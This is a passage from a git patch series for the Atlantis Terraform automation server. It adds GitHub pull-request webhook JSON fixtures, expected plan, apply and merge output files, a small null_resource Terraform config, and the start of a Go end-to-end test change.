"subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:17Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 8, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 1, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 1, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json new file mode 100644 index 0000000000..0b969438ec --- /dev/null +++ b/server/testfixtures/githubPullRequestOpenedEvent.json @@ -0,0 +1,468 @@ +{ + "action": "opened", + "number": 2, + "pull_request": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2", + "id": 194034250, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTk0MDM0MjUw", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2", + "number": 2, + "state": "open", + "locked": false, + "title": "Noyaml", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "body": "", + "created_at": "2018-06-11T16:22:16Z", + "updated_at": "2018-06-11T16:22:16Z", + "closed_at": null, + "merged_at": null, + "merge_commit_sha": null, + "assignee": null, + "assignees": [ + + ], + "requested_reviewers": [ + + ], + "requested_teams": [ + + ], + "labels": [ + + ], + "milestone": null, + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments", + "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d", + "head": { + "label": "runatlantis:noyaml", + "ref": "noyaml", + "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + } + }, + "base": { + "label": "runatlantis:master", + "ref": "master", + "sha": "f59a822e83b3cd193142c7624ea635a5d7894388", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "repo": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + } + }, + "_links": { + "self": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2" + }, + "html": { + "href": "https://github.com/runatlantis/atlantis-tests/pull/2" + }, + "issue": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2" + }, + "comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments" + }, + "review_comments": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments" + }, + "review_comment": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" + }, + "commits": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits" + }, + "statuses": { + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d" + } + }, + "author_association": "OWNER", + "merged": false, + "mergeable": null, + "rebaseable": null, + "mergeable_state": "unknown", + "merged_by": null, + "comments": 0, + "review_comments": 0, + "maintainer_can_modify": false, + "commits": 5, + "additions": 181, + "deletions": 8, + "changed_files": 23 + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}", + "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments", + "created_at": "2018-06-07T12:28:23Z", + "updated_at": "2018-06-07T12:28:27Z", + "pushed_at": "2018-06-11T16:22:09Z", + "git_url": "git://github.com/runatlantis/atlantis-tests.git", + "ssh_url": "git@github.com:runatlantis/atlantis-tests.git", + "clone_url": "https://github.com/runatlantis/atlantis-tests.git", + "svn_url": "https://github.com/runatlantis/atlantis-tests", + "homepage": null, + "size": 7, + "stargazers_count": 0, + "watchers_count": 0, + "language": "HCL", + "has_issues": false, + "has_projects": true, + "has_downloads": true, + "has_wiki": false, + "has_pages": false, + "forks_count": 0, + "mirror_url": null, + "archived": false, + "open_issues_count": 2, + "license": { + "key": "other", + "name": "Other", + "spdx_id": null, + "url": null, + "node_id": "MDc6TGljZW5zZTA=" + }, + "forks": 0, + "open_issues": 2, + "watchers": 0, + "default_branch": "master" + }, + "sender": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + } +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt new file mode 100644 index 0000000000..4d254afae5 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +this = default + +``` + diff --git a/server/testfixtures/test-repos/simple/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf index 648c412e1f..028fbb2139 100644 --- a/server/testfixtures/test-repos/simple/main.tf +++ b/server/testfixtures/test-repos/simple/main.tf @@ -1,3 +1,11 @@ resource "null_resource" "simple" { count = 1 +} + +variable "var" { + default = "default" +} + +output "this" { + value = "${var.var}" } \ No newline at end of file From a162b36b94305c75877c56328335f36baeecca4e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Sat, 16 Jun 2018 20:54:29 +0100 Subject: [PATCH 25/69] Remove need for .git in test fixtures. --- server/events_controller_e2e_test.go | 43 ++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 5 deletions(-) diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 8a9bd66915..35795cb3e7 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,6 +6,7 @@ import ( "io/ioutil" "net/http" "net/http/httptest" + "os/exec" "path/filepath" "regexp" "strings" @@ -72,8 +73,8 @@ func TestGitHubWorkflow(t *testing.T) { ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) t.Run(c.Description, func(t *testing.T) { // Set the repo to be cloned through the testing backdoor. - repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir)) - Ok(t, err) + repoDir, cleanup := initializeRepo(t, c.RepoDir) + defer cleanup() 